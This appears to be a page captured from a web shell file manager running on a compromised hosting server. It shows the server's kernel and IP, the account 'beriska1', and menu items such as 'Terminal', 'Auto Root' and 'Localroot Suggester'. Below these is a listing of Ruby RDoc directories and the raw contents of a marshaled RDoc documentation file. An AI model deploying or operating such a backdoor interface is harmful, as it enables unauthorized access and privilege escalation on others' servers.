Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.217.103
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby19 /
share /
ri /
1.9.1 /
system /
RDoc /
Delete
Unzip
Name
Size
Permission
Date
Action
Alias
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
AnonClass
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
AnyMethod
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Attr
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
ClassModule
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
CodeObject
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Constant
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Context
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
CrossReference
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
ERBIO
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Encoding
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Error
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Generator
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
GhostMethod
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Include
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Markup
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
MetaMethod
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
MethodAttr
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
NormalClass
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
NormalModule
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Options
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Parser
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
RDoc
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
RI
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Require
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
RubyLex
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
RubyToken
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
RubygemsHook
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
SingleClass
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Stats
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
Task
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
TokenStream
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
TopLevel
[ DIR ]
drwxr-xr-x
2026-05-01 04:24
cdesc-RDoc.ri
4.98
KB
-rw-r--r--
2023-07-26 17:26
Save
Rename
U:RDoc::NormalModule[iI" RDoc:EF@0o:RDoc::Markup::Document:@parts[o;;[-o:RDoc::Markup::Paragraph;[I"QRDoc is a Ruby documentation system which contains RDoc::RDoc for generating;TI"Odocumentation, RDoc::RI for interactive documentation and RDoc::Markup for;TI"text markup.;To:RDoc::Markup::BlankLine o; ;[ I"QRDoc::RDoc produces documentation for Ruby source files. It works similarly;TI"Nto JavaDoc, parsing the source and extracting the definition for classes,;TI"Pmodules, methods, includes and requires. It associates these with optional;TI"Kdocumentation contained in an immediately preceding comment block then;TI"2renders the result using an output formatter.;T@o; ;[I"LRDoc::Markup that converts plain text into various output formats. The;TI"Mmarkup library is used to interpret the comment blocks that RDoc uses to;TI"*document methods, classes, and so on.;T@o; ;[ I"JRDoc::RI implements the +ri+ command-line tool which displays on-line;TI"Pdocumentation for ruby classes, methods, etc. +ri+ features several output;TI"Nformats and an interactive mode (<tt>ri -i</tt>). See <tt>ri --help</tt>;TI"for further details.;T@S:RDoc::Markup::Heading: leveli: textI"Roadmap;T@o:RDoc::Markup::List: @type:BULLET:@items[ o:RDoc::Markup::ListItem:@label0;[o; ;[I"PIf you want to use RDoc to create documentation for your Ruby source files,;TI"Hsee RDoc::Markup and refer to <tt>rdoc --help</tt> for command line;TI"usage.;To;;0;[o; ;[I"MIf you want to write documentation for Ruby files see RDoc::Parser::Ruby;To;;0;[o; ;[I"GIf you want to write documentation for extensions written in C see;TI"RDoc::Parser::C;To;;0;[o; ;[I"NIf you want to generate documentation using <tt>rake</tt> see RDoc::Task.;To;;0;[o; ;[I"@If you want to drive RDoc programmatically, see RDoc::RDoc.;To;;0;[o; ;[I"LIf you want to use the library to format text blocks into HTML, look at;TI"RDoc::Markup.;To;;0;[o; ;[I"HIf you want to make an RDoc plugin such as a generator or directive;TI"handler see RDoc::RDoc.;To;;0;[o; ;[I"HIf you want to write your own output generator see RDoc::Generator.;T@S;;i; I"Summary;T@o; ;[I"JOnce installed, you can create documentation using the +rdoc+ command;T@o:RDoc::Markup::Verbatim;[I"!% rdoc [options] [names...] ;Fo; ;[I"+For an up-to-date option summary, type;T@o;;[I"% rdoc --help ;Fo; ;[I"KA typical use might be to generate documentation for a package of Ruby;TI""source (such as RDoc itself).;T@o;;[I"% rdoc ;Fo; ;[I"GThis command generates documentation for all the Ruby and C source;TI"Ifiles in and below the current directory. These will be stored in a;TI";documentation tree starting in the subdirectory +doc+.;T@o; ;[I"JYou can make this slightly more useful for your readers by having the;TI"Gindex page contain the documentation for the primary file. In our;TI"case, we could type;T@o;;[I"% rdoc --main README.txt ;Fo; ;[I"IYou'll find information on the various formatting tricks you can use;TI";in comment blocks in the documentation this generates.;T@o; ;[I"QRDoc uses file extensions to determine how to process each file. File names;TI"Bending +.rb+ and +.rbw+ are assumed to be Ruby source. Files;TI"Gending +.c+ are parsed as C files. All other files are assumed to;TI"Jcontain just Markup-style markup (with or without leading '#' comment;TI"Gmarkers). If directory names are passed to RDoc, they are scanned;TI"2recursively for C and Ruby source files only.;T@S;;i; I"Other stuff;T@o; ;[I"MRDoc is currently being maintained by Eric Hodel <drbrain@segment7.net>.;T@o; ;[I"ODave Thomas <dave@pragmaticprogrammer.com> is the original author of RDoc.;T@S;;i; I"Credits;T@o;;;;[o;;0;[o; ;[I"IThe Ruby parser in rdoc/parse.rb is based heavily on the outstanding;TI"Jwork of Keiju ISHITSUKA of Nippon Rational Inc, who produced the Ruby;TI"*parser for irb and the rtags package.;T: @fileI"lib/rdoc.rb;T;0[ [[I"KNOWN_CLASSES;Fo;;[o; ;[I"4Ruby's built-in classes, modules and exceptions;T;0I"lib/rdoc/known_classes.rb;T[I"VERSION;Fo;;[o; ;[I"RDoc version you are using;T;0@�[I"VISIBILITIES;Fo;;[o; ;[I"Method visibilities;T;0@�[I"DOT_DOC_FILENAME;Fo;;[o; ;[I"OName of the dotfile that contains the description of files to be processed;TI"in the current directory;T;0@�[I"GENERAL_MODIFIERS;Fo;;[o; ;[I"General RDoc modifiers;T;0@�[I"CLASS_MODIFIERS;Fo;;[o; ;[I"RDoc modifiers for classes;T;0@�[I"ATTR_MODIFIERS;Fo;;[o; ;[I""RDoc modifiers for attributes;T;0@�[I"CONSTANT_MODIFIERS;Fo;;[o; ;[I"!RDoc modifiers for constants;T;0@�[I"METHOD_MODIFIERS;Fo;;[o; ;[I"RDoc modifiers for methods;T;0@�[ [[I" class;F[[:public[ [:protected[ [:private[ [I" instance;F[[;[ [;[ [;[